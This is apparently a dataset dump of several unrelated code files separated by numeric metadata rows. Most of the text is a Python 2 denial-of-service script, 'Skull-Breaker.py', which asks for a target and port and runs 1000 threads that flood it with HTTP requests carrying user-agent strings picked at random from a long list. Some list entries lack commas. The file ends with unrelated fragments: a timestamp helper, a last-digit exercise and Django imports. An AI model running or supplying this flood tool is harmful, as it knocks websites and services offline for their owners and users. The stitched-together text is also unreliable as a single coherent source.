"Mozilla/5.0 (Linux i686 ; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.70",
"Mozilla/5.0 (Linux i686; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0",
"Mozilla/5.0 (Linux i686; U; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51",
"Mozilla/5.0 (Linux) Gecko Iceweasel (Debian) Mnenhy",
"Mozilla/5.0 (Linux; U) Opera 6.02 [en]",
"Mozilla/5.0 (Linux; U; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13",
"Mozilla/5.0 (MSIE 7.0; Macintosh; U; SunOS; X11; gu; SV1; InfoPath.2; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)",
"Mozilla/5.0 (Macintosh; ; Intel Mac OS X; fr; rv:1.8.1.1) Gecko/20061204 Opera",
"Mozilla/5.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4",
"Mozilla/5.0 (Macintosh; I; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20110608 SeaMonkey/2.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b11) Gecko/20110209 Firefox/ SeaMonkey/2.1b2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0a2) Gecko/20111101 Firefox/9.0a2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.31 (KHTML, like Gecko) Chrome/13.0.748.0 Safari/534.31",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.801.0 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.151 Safari/535.19",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6) AppleWebKit/531.4 (KHTML, like Gecko) Version/4.0.3 Safari/531.4",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1200.0 Iron/21.0.1200.0 Safari/537.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.32 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.698.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.6) Gecko/20100101 Firefox/10.0.6 Iceweasel/10.0.6",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.7) Gecko/20100101 Firefox/10.0.7 Iceweasel/10.0.7",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0a2) Gecko/20111118 Firefox/10.0a2 Iceweasel/10.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Debian Iceweasel/14.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20120721 Debian Iceweasel/15.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0 Iceweasel/13.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1 Iceweasel/13.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0 Iceweasel/14.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Iceweasel/14.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0 Iceweasel/15.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1 Iceweasel/15.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20120724 Debian Iceweasel/15.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20110506 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20110609 Firefox/4.0.1 SeaMonkey/2.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0b9pre) Gecko/20110111 Firefox/4.0b9pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:6.0.1) Gecko/20110831 conkeror/0.9.3",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 Iceweasel/7.0.1 Debian",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110602 Firefox/7.0a1 SeaMonkey/2.2a1pre Lightning/1.1a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Iceweasel/9.0.1",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9",
"Mozilla/5.0 (X11; Linux; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Midori/0.4",
"Mozilla/5.0 (X11; U; AIX 0048013C4C00; en-US; rv:1.0.1) Gecko/20021009 Netscape/7.0",
"Mozilla/5.0 (X11; U; AIX 005A471A4C00; en-US; rv:1.0rc2) Gecko/20020514",
"Mozilla/5.0 (X11; U; AIX 5.3; en-US; rv:1.7.12) Gecko/20051025",
"Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.339",
"Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.339 Safari/534.10",
"Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.341 Safari/534.10"
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.4) Gecko/20070704 Firefox/2.0.0.6",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.4) Gecko/20071127 Firefox/2.0.0.11",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.6) Gecko/20070819 Firefox/2.0.0.6",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.7) Gecko/20070930 Firefox/2.0.0.7",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.8) Gecko/20101230 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; OpenBSD ppc; en-US; rv:1.8.0.10) Gecko/20070223 Firefox/1.5.0.10",
"Mozilla/5.0 (X11; U; OpenBSD ppc; en-US; rv:1.8.1.4) Gecko/20070223 BonEcho/2.0.0.4",
"Mozilla/5.0 (X11; U; OpenBSD ppc; en-US; rv:1.8.1.9) Gecko/20070223 BonEcho/2.0.0.9",
"Mozilla/5.0 (X11; U; OpenBSD sparc64; en-AU; rv:1.8.1.6) Gecko/20071225 Firefox/2.0.07",
"Mozilla/5.0 (X11; U; OpenBSD sparc64; en-US; rv:1.8.1.6) Gecko/20070816 Firefox/2.0.0.6",
"Mozilla/5.0 (X11; U; OpenBSD sparc64; pl-PL; rv:1.8.0.2) Gecko/20060429 Firefox/1.5.0.2",
"Mozilla/5.0 (X11; U; Slackware Linux i686; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10",
"Mozilla/5.0 (X11; U; Slackware Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.30 Safari/532.5",
"Mozilla/5.0 (X11; U; SunOS 5.11; en-US; rv:1.8.0.2) Gecko/20050405 Epiphany/1.7.1",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20041221",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20050502",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20051027",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20051122",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20060627",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7.12) Gecko/20051121 Firefox/1.0.7 (Nexenta package 1.0.7)",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7.5) Gecko/20041109 Firefox/1.0",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.0.5) Gecko/20060728 Firefox/1.5.0.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1) Gecko/20061211 Firefox/2.0",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.3) Gecko/20070423 Firefox/2.0.0.3",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.4) Gecko/20070622 Firefox/2.0.0.4",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-ZW; rv:1.8.1.6) Gecko/20071125 Firefox/2.0.0.6",
"Mozilla/5.0 (X11; U; SunOS i86pc; fr; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4",
"Mozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:0.9.4.1) Gecko/20020518 Netscape6/6.2.3",
"Mozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:1.7) Gecko/20070606",
"Mozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:1.8.1.6) Gecko/20070805 Firefox/2.0.0.6",
"Mozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:1.9.1b4) Gecko/20090428 Firefox/2.0.0.0",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-GB; rv:1.8.0.1) Gecko/20060206 Firefox/1.5.0.1",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.2) Gecko/20011002 Netscape6/6.1",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4) Gecko/20011206 Netscape6/6.2.1",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020406 Netscape6/6.2.2",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020518 Netscape6/6.2.3",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.0) Gecko/20020611",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020719 Netscape/7.0",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020920 Netscape/7.0",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020921 Netscape/7.0",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.1) Gecko/20020827",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.1) Gecko/20020909",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.1) Gecko/20020925",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.2.1) Gecko/20021205",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.2.1) Gecko/20021212",
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.2.1) Gecko/20021217"
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.2.1) Gecko/20021217"
"Opera/9.10 (X11; Linux i686; U; kubuntu;pl)",
"Opera/9.10 (X11; Linux i686; U; pl)",
"Opera/9.10 (X11; Linux x86_64; U; en)",
"Opera/9.10 (X11; Linux; U; en)",
"Opera/9.12 (Windows NT 5.0; U)",
"Opera/9.12 (Windows NT 5.0; U; ru)",
"Opera/9.12 (X11; Linux i686; U; en) (Ubuntu)",
"Opera/9.20 (Windows NT 5.1; U; MEGAUPLOAD=1.0; es-es)",
"Opera/9.20 (Windows NT 5.1; U; en)",
"Opera/9.20 (Windows NT 5.1; U; es-AR)",
"Opera/9.20 (Windows NT 5.1; U; es-es)",
"Opera/9.20 (Windows NT 5.1; U; it)",
"Opera/9.20 (Windows NT 5.1; U; nb)",
"Opera/9.20 (Windows NT 5.1; U; zh-tw)",
"Opera/9.20 (Windows NT 5.2; U; en)",
"Opera/9.20 (Windows NT 6.0; U; de)",
"Opera/9.20 (Windows NT 6.0; U; en)",
"Opera/9.20 (Windows NT 6.0; U; es-es)",
"Opera/9.20 (X11; Linux i586; U; en)",
"Opera/9.20 (X11; Linux i686; U; en)",
"Opera/9.20 (X11; Linux i686; U; es-es)",
"Opera/9.20 (X11; Linux i686; U; pl)",
"Opera/9.20 (X11; Linux i686; U; ru)",
"Opera/9.20 (X11; Linux i686; U; tr)",
"Opera/9.20 (X11; Linux ppc; U; en)",
"Opera/9.20 (X11; Linux x86_64; U; en)",
"Opera/9.20(Windows NT 5.1; U; en)",
"Opera/9.21 (Macintosh; Intel Mac OS X; U; en)",
"Opera/9.21 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.21 (Windows 98; U; en)",
"Opera/9.21 (Windows NT 5.0; U; de)",
"Opera/9.21 (Windows NT 5.1; U; MEGAUPLOAD 1.0; en)",
"Opera/9.21 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru)",
"Opera/9.21 (Windows NT 5.1; U; de)",
"Opera/9.21 (Windows NT 5.1; U; en)",
"Opera/9.21 (Windows NT 5.1; U; fr)",
"Opera/9.21 (Windows NT 5.1; U; nl)",
"Opera/9.21 (Windows NT 5.1; U; pl)",
"Opera/9.21 (Windows NT 5.1; U; pt-br)",
"Opera/9.21 (Windows NT 5.1; U; ru)",
"Opera/9.21 (Windows NT 5.2; U; en)",
"Opera/9.21 (Windows NT 6.0; U; en)",
"Opera/9.21 (Windows NT 6.0; U; nb)",
"Opera/9.21 (X11; Linux i686; U; de)",
"Opera/9.21 (X11; Linux i686; U; en)",
"Opera/9.21 (X11; Linux i686; U; es-es)",
"Opera/9.22 (X11; OpenBSD i386; U; en)",
"Opera/9.23 (Mac OS X; fr)",
"Opera/9.23 (Mac OS X; ru)",
"Opera/9.23 (Macintosh; Intel Mac OS X; U; ja)",
"Opera/9.23 (Nintendo Wii; U; ; 1038-58; Wii Internet Channel/1.0; en)",
"Opera/9.23 (Windows NT 6.0; U; de)",
"Opera/9.24 (X11; SunOS i86pc; U; en)",
"Opera/9.25 (Macintosh; Intel Mac OS X; U; en)",
"Opera/9.25 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.25 (OpenSolaris; U; en)",
"Opera/9.25 (X11; Linux i686; U; fr)",
"Opera/9.25 (X11; Linux i686; U; fr-ca)",
"Opera/9.26 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.26 (Windows NT 5.1; U; MEGAUPLOAD 2.0; en)"
"Mozilla/5.0 (compatible; ABrowse 0.4; Syllable)",
"Mozilla/5.0 (compatible; IBrowse 3.0; AmigaOS4.0)",
"Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)",
"Mozilla/5.0 (compatible; Konqueror/2.1.2; X11)",
"Mozilla/5.0 (compatible; Konqueror/2.2-11; Linux)",
"Mozilla/5.0 (compatible; Konqueror/2.2-12; Linux)",
"Mozilla/5.0 (compatible; Konqueror/2.2.1; Linux)",
"Mozilla/5.0 (compatible; Konqueror/2.2.2)",
"Mozilla/5.0 (compatible; Konqueror/2.2.2-3; Linux)",
"Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux 2.4.14-xfs; X11; i686)",
"Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020217)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020319)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020523)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020703)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020704)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020705)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020723)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020726)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020801)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020807)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020808)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020906)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020911)",
"Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020917)",
"Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1",
"Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.2.15 Version/10.00",
"Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.00",
"Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.10",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.61",
"Opera/9.80 (Windows NT 6.1; U; en-GB) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Windows NT 6.1; U; en-US) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.2.15 Version/10.00",
"Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Windows NT 6.1; U; fr) Presto/2.5.24 Version/10.52",
"Opera/9.80 (Windows NT 6.1; U; ja) Presto/2.5.22 Version/10.50",
"Opera/9.80 (Windows NT 6.1; U; ko) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.6.31 Version/10.70",
"Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Windows NT 6.1; U; sk) Presto/2.6.22 Version/10.50",
"Opera/9.80 (Windows NT 6.1; U; sv) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.2.15 Version/10.00",
"Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.5.22 Version/10.50",
"Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.30 Version/10.61",
"Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.37 Version/11.00",
"Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.5.22 Version/10.50",
"Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; WOW64; U; pt) Presto/2.10.229 Version/11.62",
"Opera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux i686; U; de) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux i686; U; en) Presto/2.5.27 Version/10.60",
"Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.5.24 Version/10.53",
"Opera/9.80 (X11; Linux i686; U; pt-BR) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11",
"Opera/9.80 (X11; Linux x86_64; U; Ubuntu/10.10 (maverick); pl) Presto/2.7.62 Version/11.01",
"Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10",
"Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux x86_64; U; en) Presto/2.2.15 Version/10.00",
"Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01",
"Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9.168 Version/11.50",
"Opera/9.80 (X11; Linux x86_64; U; it) Presto/2.2.15 Version/10.10"
]
import socket, random, threading, time
print"""\033[92m
################################
hello there and welcome!!!
this is Chaotic Mind's property
so expect an exciting experience
for you with this Dos tool
Tool:
Skull-Breaker.py
Author:
Chaotic Mind
enjoy!!!!
################################ """
u=raw_input('\n\n TARGET:\n (www.example.com or IP)\n >')
p=input('\n PORT:\n >')
i=0
def k():
global i
i+=1
print'requests sent:', i
def so():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((u,p))
s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
s.send("User-Agent: {}\r\n".format(random.choice(ua)).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
k()
except socket.error as e:
pass
class HTTPThread(threading.Thread):
def run(self):
try:
while True:
so()
except Exception, ex:
pass
for x in range(1000):
t = HTTPThread()
t.start()
| 82.75 | 464 | 0.656103 | 6,251 | 31,114 | 3.246361 | 0.084147 | 0.026216 | 0.109545 | 0.054994 | 0.77337 | 0.744099 | 0.718869 | 0.686099 | 0.634652 | 0.599665 | 0 | 0.232788 | 0.148968 | 31,114 | 375 | 465 | 82.970667 | 0.533593 | 0 | 0 | 0.022039 | 0 | 0.785124 | 0.894453 | 0.003921 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.00551 | 0.002755 | null | null | 0.00551 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a32643233a860a1ccdf7165adc2365e8c0ba993 | 115 | py | Python | bmds_server/common/utils.py | shapiromatron/bmds-server | 0b2b79b521728582fa66100621e9ea03e251f9f1 | [
"MIT"
] | 1 | 2019-07-09T16:42:15.000Z | 2019-07-09T16:42:15.000Z | bmds_server/common/utils.py | shapiromatron/bmds-server | 0b2b79b521728582fa66100621e9ea03e251f9f1 | [
"MIT"
] | 103 | 2016-11-14T15:58:53.000Z | 2022-03-07T21:01:03.000Z | bmds_server/common/utils.py | shapiromatron/bmds-server | 0b2b79b521728582fa66100621e9ea03e251f9f1 | [
"MIT"
] | 2 | 2017-03-17T20:43:22.000Z | 2018-01-04T19:15:18.000Z | from datetime import datetime
def to_timestamp(dt: datetime) -> str:
return dt.strftime("%Y-%b-%d %H:%m %Z")
| 19.166667 | 43 | 0.66087 | 19 | 115 | 3.947368 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165217 | 115 | 5 | 44 | 23 | 0.78125 | 0 | 0 | 0 | 0 | 0 | 0.147826 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
6a36b960765ee707d2c040682ade5ca9c6fb026a | 114 | py | Python | 0x01-python-if_else_loops_functions/9-print_last_digit.py | Trice254/alx-higher_level_programming | b49b7adaf2c3faa290b3652ad703914f8013c67c | [
"MIT"
] | null | null | null | 0x01-python-if_else_loops_functions/9-print_last_digit.py | Trice254/alx-higher_level_programming | b49b7adaf2c3faa290b3652ad703914f8013c67c | [
"MIT"
] | null | null | null | 0x01-python-if_else_loops_functions/9-print_last_digit.py | Trice254/alx-higher_level_programming | b49b7adaf2c3faa290b3652ad703914f8013c67c | [
"MIT"
] | null | null | null | #!/usr/bin/python3
def print_last_digit(number):
print(abs(number) % 10, end='')
return(abs(number) % 10)
| 22.8 | 35 | 0.649123 | 17 | 114 | 4.235294 | 0.705882 | 0.25 | 0.305556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052083 | 0.157895 | 114 | 4 | 36 | 28.5 | 0.697917 | 0.149123 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
dbecdd1e1dcf7de09c07b464cba5f458775c50e0 | 61 | py | Python | dashboard/signals.py | astrid-project/security-dashboard | 0690e017238171899745eacc89f89cf61d8efecc | [
"Apache-2.0"
] | 1 | 2020-10-14T19:50:32.000Z | 2020-10-14T19:50:32.000Z | dashboard/signals.py | astrid-project/security-dashboard | 0690e017238171899745eacc89f89cf61d8efecc | [
"Apache-2.0"
] | null | null | null | dashboard/signals.py | astrid-project/security-dashboard | 0690e017238171899745eacc89f89cf61d8efecc | [
"Apache-2.0"
] | 1 | 2021-07-07T14:20:34.000Z | 2021-07-07T14:20:34.000Z | import django.dispatch
from django.dispatch import receiver
